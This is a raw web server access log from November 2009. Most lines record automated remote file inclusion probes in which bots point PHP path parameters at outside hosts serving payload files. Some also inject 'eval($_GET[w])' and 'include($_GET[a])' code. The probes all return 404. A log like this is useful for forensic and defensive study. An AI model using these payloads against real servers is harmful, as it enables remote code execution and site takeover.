121.78.116.203 - - [01/Nov/2009:01:54:53 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
80.247.164.121 - - [01/Nov/2009:01:55:03 -0500] "GET //index.php?site=http://www.medisite.fr/id???? HTTP/1.1" 404 208 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
121.78.116.203 - - [01/Nov/2009:01:55:03 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
80.247.164.121 - - [01/Nov/2009:01:55:06 -0500] "GET /logs//index.php?site=http://www.medisite.fr/id???? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
121.78.116.203 - - [01/Nov/2009:01:55:16 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.78.174.29 - - [01/Nov/2009:01:55:27 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:27 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:27 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:30 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:32 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:32 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:33 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:55:33 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
220.80.108.81 - - [01/Nov/2009:01:55:52 -0500] "GET /logs/access_log.Q109052300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:55:59 -0500] "GET /logs/access_log.Q109062200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:55:59 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:55:59 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:01:56:16 -0500] "GET /logs/error_log.Q109092700//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://0pop.com/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
125.251.99.2 - - [01/Nov/2009:01:56:29 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:56:29 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:56:29 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:56:35 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:56:35 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:56:38 -0500] "GET /logs/error_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:56:43 -0500] "GET /logs/access_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:56:43 -0500] "GET /logs/error_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:57:33 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:57:36 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:57:36 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:57:40 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:57:54 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:58:01 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:58:01 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:58:01 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:58:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.78.174.29 - - [01/Nov/2009:01:58:21 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:58:21 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
207.58.164.77 - - [01/Nov/2009:01:58:21 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 242 "-" "-"
207.58.164.77 - - [01/Nov/2009:01:58:22 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 237 "-" "-"
207.58.164.77 - - [01/Nov/2009:01:58:23 -0500] "GET /logs/error_log.Q109092900%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 264 "-" "-"
65.78.174.29 - - [01/Nov/2009:01:58:23 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
65.78.174.29 - - [01/Nov/2009:01:58:23 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
77.222.40.234 - - [01/Nov/2009:01:58:54 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:58:54 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:58:54 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:55 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:55 -0500] "GET /logs/access_log.Q109093000%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:55 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:55 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:56 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:58:56 -0500] "GET /logs/access_log.Q109093000%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:58:58 -0500] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:01 -0500] "GET /logs/error_log.Q109081300%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:03 -0500] "GET /logs/access_log.Q109052300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:03 -0500] "GET /logs/access_log.Q109093000%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:04 -0500] "GET /logs/error_log.Q109081300%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:04 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:04 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:59:12 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:59:12 -0500] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:59:15 -0500] "GET /logs/error_log.Q109081300%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:59:44 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:59:44 -0500] "GET //config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:59:44 -0500] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:08 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:08 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:12 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:12 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:13 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:15 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:00:24 -0500] "GET //config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:00:24 -0500] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:00:24 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:00:33 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:00:41 -0500] "GET /logs/access_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:41 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:00:43 -0500] "GET /logs/error_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:00:45 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:47 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:47 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:51 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:51 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:53 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:02:00:53 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:01:56 -0500] "GET /logs/access_log.Q109081300%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.64.213 - - [01/Nov/2009:02:02:58 -0500] "GET /logs/access_log.Q109081300//index.php?lg=http://www.baltimorecrashpads.com/zen_cart//images/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:03:10 -0500] "GET /logs/error_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:02:03:16 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.247.60.5 - - [01/Nov/2009:02:03:36 -0500] "GET /logs/access_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:04:02 -0500] "GET /last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://0pop.com/id.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.803"
82.193.15.3 - - [01/Nov/2009:02:04:07 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:04:07 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:04:07 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:04:07 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:04:18 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:04:18 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:04:18 -0500] "GET /logs/error_log.Q109071000/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:04:19 -0500] "GET /logs/access_log.Q109092000/last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://0pop.com/id.txt? HTTP/1.1" 404 352 "-" "libwww-perl/5.803"
125.247.60.5 - - [01/Nov/2009:02:04:32 -0500] "GET /logs/error_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:02:04:54 -0500] "GET /logs/access_log.Q109062200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:02:04:54 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:02:04:54 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:05:19 -0500] "GET /logs/access_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:02:05:24 -0500] "GET /logs/access_log.Q109052300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:05:37 -0500] "GET /logs/access_log.Q109080400/last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://0pop.com/id.txt? HTTP/1.1" 404 352 "-" "libwww-perl/5.803"
125.247.60.5 - - [01/Nov/2009:02:05:50 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:05:50 -0500] "GET //config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:05:50 -0500] "GET /logs/access_log.Q109062200//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:00 -0500] "GET /logs//admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:00 -0500] "GET //admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:00 -0500] "GET /logs/access_log.Q109051800//admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:22 -0500] "GET //admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:22 -0500] "GET /logs//admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:02:06:22 -0500] "GET /logs/access_log.Q109051800//admin/index.php?o=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:07:27 -0500] "GET /logs/access_log.Q109081800//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:02:07:33 -0500] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
